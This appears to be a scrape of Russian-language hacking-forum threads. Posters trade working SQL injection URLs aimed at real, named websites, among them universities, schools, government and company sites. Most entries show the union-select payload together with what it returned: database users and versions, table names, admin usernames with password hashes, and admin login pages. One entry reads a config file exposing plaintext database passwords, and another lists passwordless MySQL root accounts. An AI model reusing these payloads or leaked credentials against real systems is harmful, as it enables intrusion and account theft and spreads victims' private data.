Postgre SQL PostgreSQL 8.3.5 on x86_64-unknown-linux-gnu, compiled by GCC gcc (GCC) 4.2.1 (SUSE Linux)
http://www.valgymosutrikimai.lt/index.php?id=15&lng=-1+union+select+1,user()+/*+ augrika_user@localhost PR6 http://www.afropop.org/news_flash.php?ID=-593+union+select+1,version(),3,4,5,6,7,8,9,10,11,12+/*+ 4.1.22-standard http://ratibor-tlt.ru/news_full.php?id=-1+union+select+table_name+from+information_schema.tables+limit+73,100+--+ dle_users dle_email http://www.fk-novgorod.ru/news/news_full.php?id=-1+union+select+1,concat_Ws(0x3a3a,user_type,user_permissions,username,user_password),3,4,5,6,7,8,9+from+phpbb_users+limit+1,1+--+ 3::zik0zjzik0zjzik0xs zik0zi000000 qlctzq000000 zik0zi000000::fk-novgorod::$H$94M6MbO.ED4Ksztlk7usyNTUQoGTe61 http://www.hificentre.com.ua/news_full.php?id=-1'+union+select+1,2,3,concat_ws(0x3a3a,id,user,pass),5,6,7,8,9,10+from+userlist+--+ 1::adminos::97154761 http://www.hificentre.com.ua/admin/ http://www.teremnn.ru/news_full.php?id=-1+union+select+group_concat(table_name)+from+information_schema.tables+--+ /* Талицы */ http://www.khakib.ru/news_full.php?ID=-1+union+select+1,group_concat(table_name)+from+information_schema.tables+/*+&page=0 http://www.astra-link.ru/news_full.php?id=-1+union+select+1,2,group_concat(table_name),4,5+from+information_schema.tables+--+
http://www.autokovrik.com/board.php?pos=10&&view=1&mu_id=16+unioN+select+1/*&ms_type=&mm_id=&mistoid=&spoisk= Версия 4.х.yy,посимвольный перебор.Префикс так и не вскрыл. Боян или нет,но всё же: http://wwww.1gb.ru/show_article.php?upd=126'+order+by+26/* Третья ветка.
Киевский завод стеклоизделей http://www.kzs.com.ua/page.php?id=47+UNION+SELECT+1,2,concat_ws(0x3a,user(),version(),database())+FROM+users+LIMIT+1,1 kzs@localhost:4.1.22-log:kzs
http://www.valgri.it/england/shop/details.php?id=-1+union+select+1,concat_ws(0x3a,user,password),3,4,5,6+from+admin/*
http://www.parcocollinemetallifere.it/comuni.php?id=-1+union+select+1,2,concat_ws(0x3a,user,passwd),4,5,6,7,8+from+archivier.utenti+--+
PR 4 Code: http://www.mdkiosk.com/subscription.php?ID=-1+union+select+concat_ws(0x3a,user(),database(),version()) mdkiosk@localhost:mdkiosk:5.0.27 .TV PR 3 Code: http://www.famicomdojo.tv/subscription.php?id=1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),database(),version()),10,11,12,13,14,15,16,17/* tfboogaloo@logic:FamicomDojo:5.0.37-standard
############################################### PR5 http://www.metodistademinas.edu.br/novo/cursos2v.php?id=-1+union+select+1,concat_Ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- [email protected]:metodistademin:5.1.30-community
http://www.anosy.gov.mg/index.php?self=5&page=-2+union+select+1,concat_ws(0x3a,username,password),3,4+from+jos_users+--+
http://www.pragmaticus.ru/news.php?id=-320+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6 5.0.67[email protected]ragmatic ТИЦ 80, PR 3
PR3 http://battlefieldsingleplayer.planetbattlefield.gamespy.com/index.php?pg=games_temp&g=1+AND+substring((version()),1,1)=x Version: 4.1.21-log User : [email protected] Database : Dnam
посмотрите сайт, я уже несколько раз видел такое. Я выложил сюда ИНДЖ и через 10 мин на сайте такое же написано было. Аналогично и с этим сайтом там было типа "AYYILDIZ TEAM Ab1i HACKED" уже кто-то ачат влепил
http://www.icabc-pd.com/pd-seminars-seminar.php?id=-915+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x3a,version(),user(),database()),17 4.1.20dperson@localhost:dbpd PR4 ---------------- http://hbdinc.org/seminar.php?c=-1004+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6 5.0.75:[email protected]:hbdinc PR 5 --------------- http://socorro.ece.unm.edu/event/seminar.php?id=-192+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9,10,11,12,13,14 5.0.45:aphex@localhost:web1 Таблицы: TA_users (user,pwd) http://socorro.ece.unm.edu/event/seminar.php?id=-192+union+select+1,2,3,4,5,concat_ws(0x3a,user,pwd),7,8,9,10,11,12,13,14+from+TA_users dvargas:302697aaf74426092f91730fb2d6ccd3 311admin:ce4fb0b63857dfa71184f137f0c102e5 jbach:9293d02937dd21a4595d650aa52a4cb4 eecenewsusers (user,pwd) http://socorro.ece.unm.edu/event/seminar.php?id=-192+union+select+1,2,3,4,5,concat_ws (0x3a,user,pwd),7,8,9,10,11,12,13,14+from+eecenewsusers+limit+0,1 jean:0421008445828ceb46f496700a5fa65e webmaster:d2718c3f00a7aed3c6a0c12c31dac3fe seminarusers (user,pwd) http://socorro.ece.unm.edu/event/seminar.php?id=-192+union+select+1,2,3,4,5,concat_ws (0x3a,user,pwd),7,8,9,10,11,12,13,14+fro+seminarusers+limit+0,1 chaouki:47c4af02a9fba4a578f041e3277be116 faculty:bb8ebde87e5ea6724df5ab428f20b8c4 graduate:939ceb2be77a7fe133cdea4aef65c921 aphex:a18c70c5e2f22ca9cd7d389c8e436a92 locutus627:9174e8961e5e69e81c9fd9dbd44b0e5b webmaster:204520204334e36e jean:0421008445828ceb46f496700a5fa65e wp_users (ID,user_login,user_pass,user_nicename,user_email,user_url,user_registered,user_activation_key,user_status,display_name) 1:admin:$P$BK8i8ZTFXTDciGPGomG1mxoEKPdaVf0:admin:[email protected]::2009-05-28 04:08:03::0:admin
http://www.dennisvinkonline.nl/seminar.php?id=-5+union+select+1,concat_ws(0x3a,version(),user(),database%20%20%20()),3,4,5,6,7,8,9 5.0.51a-community-log:[email protected]:dennisvink_dennis Таблица admin (id,user,pass) http://www.dennisvinkonline.nl/seminar.php?id=-5+union+select+1,table_name,3,4,5,6,7,8,9+from+information_schema.tables+limit+17,1 Вытаскиваем: http://www.dennisvinkonline.nl/seminar.php?id=-5+union+select+1,concat_ws(0x3a,id,user,pass),3,4,5,6,7,8,9+from+admin+limit+0,1 2:dennis:bf2eb761d40672c33dbf02da9ab62837 Админка: http://www.dennisvinkonline.nl/admin/
gamebrix.com Code: http://www.gamebrix.com/subscription.php?page=subscriptiondetail&id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 Code: db@fs1@C34728-112966:tomcatusersnet:5.0.45-community-nt Code: http://www.gamebrix.com/subscription.php?page=subscriptiondetail&id=-1' Code: http://www.gamebrix.com/subscription.php?page=subscriptiondetail&id=-1+union+select+1,load_file(0x433A5C4E616272616E615C7068707365727665725C7777775C636F6E6669675C636F6E6669672E706870),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 Code: define('DB_HOST','C34728-112966'); // database host name define('DB_NAME','tomcatusersnet'); // database name define('DB_USER','db@fs1'); // database username define('DB_PASSWORD','digital'); define('FORUM_DB_HOST','C34728-112966'); // database host name define('FORUM_DB_NAME','forumnet'); // database name define('FORUM_DB_USER','db@fs1'); // database username define('FORUM_DB_PASSWORD','digital'); Code: http://www.gamebrix.com/subscription.php?page=subscriptiondetail&id=-1+union+select+1,concat_ws(0x3a,username,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+forum.phpbb_users+limit+1,1 Code: gbrixadmin:020ed5f83af5275d6ad6b15bbd247576
http://www.swan.ac.uk/compsci/research/seminars/seminar.php?seminar=-422+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),user(),database()),10,11,12 5.0.26:[email protected]:seminar PR 7 http://www.goldbio.com/seminar.php?seminarId=-13+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,version(),user(),database()) 4.1.22:goldbiouser@localhost:GoldBio
Специально для Турков чтобы она не брали чужие хаки и не писали что их страна великая и там супер хакеры, пускай свои ломают сайты, точней доламывают ))) maxoyun@localhost 5.0.33-log maxoyun Таблы [email protected] 5.0.51a-log iumezusa_iumezusa Мемберы malatya__malatya@localhost 4.1.18-nt-max malatya__malatya abhaber_root@localhost 5.0.67-community-log abhaber_abhaber godtu_user@localhost 5.1.30-log godtu_godtu root@localhost 5.0.32-Debian_7etch3-log otodefteri
http://www.goldbio.com/seminar.php?seminarId=-13+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,version(),user(),database()) 4.1.22:goldbiouser@localhost:GoldBio http://lammp.bli.uci.edu/seminar.php?mode=abstract&id=-329+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5/* 5.0.45:root@localhost:events мммм, как сладко Вытаскиваем: http://lammp.bli.uci.edu/seminar.php?mode=abstract&id=-329+union+select+1,2,concat_ws(0x3a,user,password,host),4,5+from+mysql.user/* root::localhost root::webhost.bli.uci.edu root::127.0.0.1 ntroiwikiadmin:*8B8A4BCE24C00513D82A6DE18A58DD80DFB1E993:localhost vpwikiuser:*0E2172CA358B9492A4D030BF3D06DF4EE75742F0:% vpwikiuser:*0E2172CA358B9492A4D030BF3D06DF4EE75742F0:localhost vpwikiuser:*0E2172CA358B9492A4D030BF3D06DF4EE75742F0:localhost.localdomain неплохо, root Без пароля, под vpwikiuser тоже множно подключиться откуда угодно
PR6 http://www.whathaseuropedone.eu/event_detail.php?event_id=-227'+union+select+1,2,3,concat_ws(0x3a,version(),database(),useR(),@@version_compile_os),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/* Database Version: 4.1.15-standard Database name: whateurope_1 User name: whatadmin@localhost Os : pc-linux-gnu
ttp://www.agira.ru/school.php?serv=2+and+substring(version(),1,1)=4 ТИЦ 40 http://www.sschouston.org/school.php?sview=-35+union+select+concat_ws(0x3a,version(),user (),database()),2,3,4,5,6,7,8,9,10,11,12,13,14 5.0.67.d7-ourdelta-log:[email protected]:sscdata таблицы http://www.sschouston.org/school.php?sview=-35+union+select+table_name,2,3,4,5,6,7,8,9,10,11,12,13,14+from+information_schema.tables users(id,username,password) http://www.sschouston.org/school.php?sview=-35+union+select+concat_ws (0x3a,id,username,password),2,3,4,5,6,7,8,9,10,11,12,13,14+from+users 1:member:268184C12DF027F536154D099D497B31 PR 2 Вход: http://www.sschouston.org/login.php ---------------- http://www.natronaschools.org/school.php?id=-57+union+select+1,concat_ws(0x3a,version(),user (),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,3 6,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57 4.1.22-log:adbay@localhost:school_db PR 4 ------------ третий мускуль http://dcrush.obninsk.ru/school.php?id_p=1+and+substring(version(),1,1)=3